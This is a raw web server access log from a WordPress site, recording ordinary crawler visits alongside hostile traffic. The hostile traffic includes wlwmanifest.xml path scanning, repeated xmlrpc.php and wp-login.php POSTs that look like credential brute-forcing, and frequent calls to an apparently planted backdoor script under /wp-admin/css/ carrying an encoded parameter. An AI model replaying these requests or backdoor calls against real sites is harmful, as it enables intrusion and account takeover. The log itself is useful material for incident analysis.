146.70.194.236 - - [16/Oct/2025:16:06:32 -0400] "GET //2019/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.236 - - [16/Oct/2025:16:06:33 -0400] "GET //shop/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.236 - - [16/Oct/2025:16:06:34 -0400] "GET //wp1/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.236 - - [16/Oct/2025:16:06:34 -0400] "GET //test/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.236 - - [16/Oct/2025:16:06:35 -0400] "GET //media/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.236 - - [16/Oct/2025:16:06:36 -0400] "GET //wp2/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.236 - - [16/Oct/2025:16:06:37 -0400] "GET //site/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.236 - - [16/Oct/2025:16:06:39 -0400] "GET //cms/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.236 - - [16/Oct/2025:16:06:39 -0400] "GET //sito/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
146.70.194.236 - - [16/Oct/2025:16:06:40 -0400] "" 400 0 "-" "-"
66.249.65.195 - - [16/Oct/2025:16:06:48 -0400] "GET /?_g=520253 HTTP/1.0" 200 24164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:16:05:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383735312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353135312q6461626365383436353862663263316134323837643936633365336138336131222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:16:06:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383737312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353137312q6234333435613437383562333762383838616631303135393537393963363439222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:16:05:53 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:16:06:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383739312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353139312q3932663330333766316363363033336534333634333964623561626465373037222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
57.141.0.3 - - [16/Oct/2025:16:07:36 -0400] "GET /market/2274326458.htm HTTP/1.0" 200 102732 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
109.196.195.198 - - [16/Oct/2025:16:07:42 -0400] "GET /?sitemapindex.xml HTTP/1.0" 200 4734 "-" "cc_bot"
142.4.205.1 - - [16/Oct/2025:16:06:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383831312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353231312q3835353134383732646334613035616435323863386566643837653030393236222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:16:07:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383833312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353233312q3032666561613664393137626336313233323163313266663063623538373734222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:16:07:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383835312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353235312q6134373661323934316163613637393334623732636334356137363631666666222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:16:07:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383837312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353237312q6566386337303565656437663663353361373430623866633362306139643739222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:16:07:24 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
45.190.212.118 - - [16/Oct/2025:16:08:58 -0400] "GET /pages.php?sitemap692.xml HTTP/1.0" 403 4945 "-" "cc_bot"
142.4.205.1 - - [16/Oct/2025:16:08:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383839312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353239312q3130643461323337623438643638666465666261386135323130373331393865222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
222.252.36.103 - - [16/Oct/2025:16:09:13 -0400] "GET /?sitemap126.xml HTTP/1.0" 200 8723 "-" "cc_bot"
142.4.205.1 - - [16/Oct/2025:16:08:34 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383931342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353331342q3239623565313039663539323835303038326533393530326535313164363666222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
3.1.56.192 - - [16/Oct/2025:16:09:52 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko"
142.4.205.1 - - [16/Oct/2025:16:08:54 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383933342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353333342q6233363435316531383063303235346535376163353334346139616630623465222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
3.1.56.192 - - [16/Oct/2025:16:10:07 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko"
142.4.205.1 - - [16/Oct/2025:16:09:14 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383935342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353335342q3932366531396634663662336333616432646532353263643830666339653835222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.197 - - [16/Oct/2025:16:10:14 -0400] "GET /?_g=69083 HTTP/1.0" 200 25457 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
159.203.133.255 - - [16/Oct/2025:16:10:17 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MASMJS; rv:11.0) like Gecko"
3.1.56.192 - - [16/Oct/2025:16:10:21 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko"
159.203.133.255 - - [16/Oct/2025:16:10:31 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MASMJS; rv:11.0) like Gecko"
142.4.205.1 - - [16/Oct/2025:16:09:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383937372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353337372q3661666536363736386563333961343630646432383435613638376133376238222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
3.1.56.192 - - [16/Oct/2025:16:10:45 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko"
159.203.133.255 - - [16/Oct/2025:16:10:46 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MASMJS; rv:11.0) like Gecko"
142.4.205.1 - - [16/Oct/2025:16:09:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634383939372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353339372q6263363231386162313063353232613339643761663665626364396361333438222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:16:11:00 -0400] "GET /?_g=917639 HTTP/1.0" 200 23952 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
3.1.56.192 - - [16/Oct/2025:16:11:01 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko"
159.203.133.255 - - [16/Oct/2025:16:11:03 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MASMJS; rv:11.0) like Gecko"
142.4.205.1 - - [16/Oct/2025:16:10:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634393031372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353431372q3331383337643062346264646436323032636361313038356162646264656563222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:16:11:16 -0400] "GET /?_g=2543170 HTTP/1.0" 200 29108 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
3.1.56.192 - - [16/Oct/2025:16:11:21 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko"
159.203.133.255 - - [16/Oct/2025:16:11:23 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MASMJS; rv:11.0) like Gecko"
66.249.65.195 - - [16/Oct/2025:16:11:23 -0400] "GET /market/51921201.htm HTTP/1.0" 200 24371 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:16:10:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634393033372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353433372q6135666266623533366662646633386534643433623037363362396639393836222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
143.208.72.35 - - [16/Oct/2025:16:11:37 -0400] "GET /?sitemap858.xml HTTP/1.0" 200 8684 "-" "cc_bot"
142.4.205.1 - - [16/Oct/2025:16:10:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634393035372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353435372q6161656133633862646138323537326130306533393366666165623137313833222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
77.68.30.96 - - [16/Oct/2025:16:12:02 -0400] "GET /wp-login.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8"
77.68.30.96 - - [16/Oct/2025:16:12:08 -0400] "POST /wp-login.php HTTP/1.0" 200 9227 "https://academiedumarketing.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8"
142.4.205.1 - - [16/Oct/2025:16:11:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634393037372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353437372q3135646237623139616465393938366165333631323233666165366331346536222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:16:11:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634393039372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353439372q6136313338326361306336396561396662633630356234323834363733373139222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
45.183.9.208 - - [16/Oct/2025:16:12:37 -0400] "GET /sitemap-subitem-1241.xml HTTP/1.0" 200 8766 "-" "cc_bot"
177.45.143.82 - - [16/Oct/2025:16:12:48 -0400] "GET /sitemap-subitem-2847.xml HTTP/1.0" 200 8722 "-" "cc_bot"
177.55.243.173 - - [16/Oct/2025:16:12:51 -0400] "GET /sitemap-subitem-1372.xml HTTP/1.0" 200 8715 "-" "cc_bot"
142.4.205.1 - - [16/Oct/2025:16:11:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634393131372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353531372q6230666330623539623163396236393032633032366435663339386630633834222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
191.108.155.182 - - [16/Oct/2025:16:13:04 -0400] "GET /sitemap-subitem-1022.xml HTTP/1.0" 200 8680 "-" "cc_bot"
142.4.205.1 - - [16/Oct/2025:16:12:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634393133372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353533372q3032616231633638633030333236303562636461363962666335363566326164222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
84.22.5.5 - - [16/Oct/2025:16:13:17 -0400] "GET /sitemap-subitem-1678.xml HTTP/1.0" 200 8740 "-" "cc_bot"
190.89.157.170 - - [16/Oct/2025:16:13:34 -0400] "GET /sitemap-subitem-2602.xml HTTP/1.0" 200 8724 "-" "cc_bot"
180.252.18.225 - - [16/Oct/2025:16:13:35 -0400] "GET /sitemap-subitem-412.xml HTTP/1.0" 200 8721 "-" "cc_bot"
142.4.205.1 - - [16/Oct/2025:16:12:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634393135372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634353535372q3661303631326230303864636436393433333465633364386630633365353935222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
177.32.19.163 - - [16/Oct/2025:16:13:45 -0400] "GET /?sitemap310.xml HTTP/1.0" 200 8720 "-" "cc_bot"
191.253.116.184 - - [16/Oct/2025:16:13:47 -0400] "GET /sitemap-subitem-1879.xml HTTP/1.0" 200 8693 "-" "cc_bot"
164.163.131.212 - - [16/Oct/2025:16:13:49 -0400] "GET /sitemap-subitem-336.xml HTTP/1.0" 200 8687 "-" "cc_bot"
177.120.40.234 - - [16/Oct/2025:16:13:51 -0400] "GET /sitemap-subitem-817.xml HTTP/1.0" 200 8704 "-" "cc_bot"
191.217.206.60 - - [16/Oct/2025:16:13:53 -0400] "GET /sitemap-subitem-1823.xml HTTP/1.0" 200 8729 "-" "cc_bot"
